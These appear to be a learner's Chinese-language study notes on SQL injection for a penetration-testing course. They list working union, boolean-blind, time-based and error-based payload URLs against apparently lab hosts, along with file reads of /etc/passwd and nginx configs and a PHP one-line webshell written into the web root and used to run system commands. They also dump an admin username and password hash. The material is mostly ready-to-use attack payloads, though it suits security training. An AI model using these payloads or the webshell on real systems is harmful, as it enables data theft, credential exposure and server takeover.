PTE学习第二天

sql注入常见分类

’
" 字符型注入

整数型注入

?id=1

select * from users where id = 1 #

select * from users where id = 1 union select * from users

?id=1
?id=1'
?id=1"
?id=1 and 1=1
?id=1 and 1=2

http://hazelshishuaige.club:28199/?id=1 and 1=2

http://hazelshishuaige.club:28199/?id=1.1 or 1=1

http://hazelshishuaige.club:28199/?id=1.1 union select 1,2

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(schema_name) from information_schema.schemata

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

http://hazelshishuaige.club:28199/?id=1.1 union select 1,group_concat(flag) from flag

文件读写

1. file权限  secure_file_priv
	空	权限开启
	NULL 权限关闭状态
	/var/lib/mysql	权限开启但是只能在/var/lib/mysql目录下进行读写
	MariaDB [(none)]> show variables like 'secure_file_priv';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.001 sec)

2. root用户
	创建的文件 所属用户组 mysql root

3. /var/lib/mysql
	linux	本身目录权限问题
	
文件读写 写入。网站根目录  /var/www/html      / 系统根目录
/var/www/html
/var/www/htdoc/localhost/
/usr/share/nginx/html/

配置文件
/etc/nginx/nginx.conf
/etc/apache2.conf
/etc/httpd.conf

#       /etc/apache2/
#       |-- apache2.conf
#       |       `--  ports.conf
#       |-- mods-enabled
#       |       |-- *.load
#       |       `-- *.conf
#       |-- conf-enabled
#       |       `-- *.conf
#       `-- sites-enabled
#               `-- *.conf

root@e3cebf7bcc19:/etc/apache2# cd sites-available/
root@e3cebf7bcc19:/etc/apache2/sites-available# ls
000-default.conf  default-ssl.conf
root@e3cebf7bcc19:/etc/apache2/sites-available# cat 000-default.conf 
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

load_file() 读文件
into outfile 写文件

要求使用绝对路径 /var/www/html/index.php。 …/index.php

load_file(‘/etc/passwd’)

http://hazelshishuaige.club:28199/index.php?id=-1 union select 1,load_file(‘/etc/nginx/nginx.conf’)

http://hazelshishuaige.club:28199/index.php?id=-1 union select 1,3 into outfile ‘/var/www/html/1.txt’

写入过程中，已经存在的文件是无法覆盖的，自己写入的文件也是无法覆盖的，不存在的文件会自动创建，写入的过程中php文件

一句话木马

<?php @eval($_REQUEST[cmd]); ?>
  
执行命令
eval() 函数，执行php代码
?cmd=phpinfo();


http://hazelshishuaige.club:28199/1.php?cmd=system('ls -al /');

system() 函数 执行系统命令
  
linux：
  ls 列出当前目录下的文件
  ls -al /   列出/目录下的所有文件并且显示文件详细信息
  whoami 查看权限
  cd 切换路径
  pwd 显示当前坐在位置路径
  cat /etc/passwd 查看文件 /etc/passwd
  nl

$id     = $_GET['id'];
$sql    = "select * from news where id=$id";
$result = mysqli_query($conn, $sql);
$res    = mysqli_fetch_array($result);

1.1 union select 1,'<?php eval($_REQUEST["shell"]) ?>'  into outfile '/var/www/html/2.php'

注入点

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1 and 1=2

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(username,password) from admin

http://hazelshishuaige.club:28194/backend/content_detail.php?id=1.1 union select 1,group_concat(username,'----',password) from admin

admin----756ba5042c492a3c2481f29e6b796bd6

where id = '1''

id=1'and 1=2#

id=1'order by 4#

id=1.1' union select 1,2,3,4#

id=1.1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#

id=1.1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

id=1.1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='fl4g'#

id=1.1' union select 1,2,3,group_concat(skctf_flag) from fl4g#s

盲注

bool盲注

bool

true

false

演示：http://hazelshishuaige.club:9901

http://hazelshishuaige.club:9901/Less-8/?id=1.1' union select 1,2,3%23

http://hazelshishuaige.club:9901/Less-8/?id=1' and 1=2%23

字符串截取函数

substr(database(),2,1)
substr('123qwe',1,1)  === 1

mid(), substr(), left()

substr('asdfsaf',1,3)  asd

mid('sladklsdjfls',3,3)  sla   adk

left('asdfsafaf',4) asdf

ord

ord('a')   97

ascii()函数

ascii(97)   a

Length()

length('asc')  3

http://hazelshishuaige.club:9901/Less-8/?id=1' and length((select database()))=1%23


?id=1' and length((   select database()  ))=1%23

?id=1' and length((   select group_concat(schema_name) from information_schema.schemata  ))=1%23

?id=1' and length((   select group_concat(table_name) from information_schema.tables where table_schema=database()  ))=1%23

?id=1' and length((   select group_concat(column_name) from information_schema.columns where table_name='users'  ))=1%23


?id=1' and substr((( select database()   )),2,1)='a'%23

?id=1' and substr((( select group_concat(schema_name) from information_schema.schemata   )),2,1)='a'%23

?id=1' and substr((( select group_concat(table_name) from information_schema.tables where table_schema=database()   )),2,1)='a'%23

?id=1' and substr((( select group_concat(column_name) from information_schema.columns where table_name='users'   )),2,1)='a'%23

?id=1' and substr((( select group_concat(schema_name) from information_schema.schemata   )),2,1)='a'%23

siniper 只有一个变量的时候

Pitchfork. 一对一

cluster bomb

题目地址：

http://hazelshishuaige.club:9901/Less-8/?id=1

要求：跑出当前正在使用的数据库名。 跑出所有数据库的前10位

延时注入

if((条件),true,false)
if((1=1),sleep(5),1)
?id=1' and length((   select database()  ))=1%23

if((length((  select database()  ))=1),sleep(5),1)
if((length((  select group_concat(schema_name) from information_schema.schemata  ))=1),sleep(5),1)
if((length((  select group_concat(table_name) from information_schema.tables where table_schema=database()  ))=1),sleep(5),1)
if((length((  select group_concat(column_name) from information_schema.columns where table_name='users'  ))=1),sleep(5),1)
if((length((  select group_concat(id,username,password) from users  ))=1),sleep(5),1)

if((substr(((  select database()   )),1,1)='a'),sleep(5),1)
if((substr(((  select group_concat(schema_name) from information_schema.schemata   )),1,1)='a'),sleep(5),1)
if((substr(((  select group_concat(table_name) from information_schema.tables where table_schema=database()   )),1,1)='a'),sleep(5),1)
if((substr(((  select group_concat(column_name) from information_schema.columns where table_name='users'   )),1,1)='a'),sleep(5),1)
if((substr(((  select group_concat(id,username,password) from users   )),1,1)='a'),sleep(5),1)

password=admaain&username=a'/**/or/**/sleep(3)#

password=admaain&username=admin'/**/and/**/sleep(3)#

password=admaain&username=admin'/**/and/**/if((length(( /**/select/**/database()/**/  ))>1),sleep(5),1)#

报错注入

http://hazelshishuaige.club:9901/Less-1/?id=1

updatexml(1,concat(0x7e,(select @@version),0x7e),1)

extractvalue(1,concat(0x7e,(select @@version),0x7e))

select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;

updatexml(1,concat(0x7e,(select database()),0x7e),1)

updatexml(1,concat(0x7e,(  select group_concat(schema_name) from information_schema.schemata   ),0x7e),1)

updatexml(1,concat(0x7e,(  substr(((select group_concat(schema_name) from information_schema.schemata)),1,32)   ),0x7e),1)

http://hazelshishuaige.club:9901/Less-1/?id=1' and updatexml(1,concat(0x7e,(  substr(((select group_concat(schema_name) from information_schema.schemata)),32,64)   ),0x7e),1)%23

extractvalue(1,concat(0x7e,(select database()),0x7e))


extractvalue(1,concat(0x7e,(      select group_concat(schema_name) from information_schema.schemata     ),0x7e))


extractvalue(1,concat(0x7e,(    substr(((  select group_concat(schema_name) from information_schema.schemata   )),1,30)    ),0x7e))

extractvalue(1,concat(0x7e,(    substr(((  select group_concat(schema_name) from information_schema.schemata   )),31,61)    ),0x7e))

堆叠注入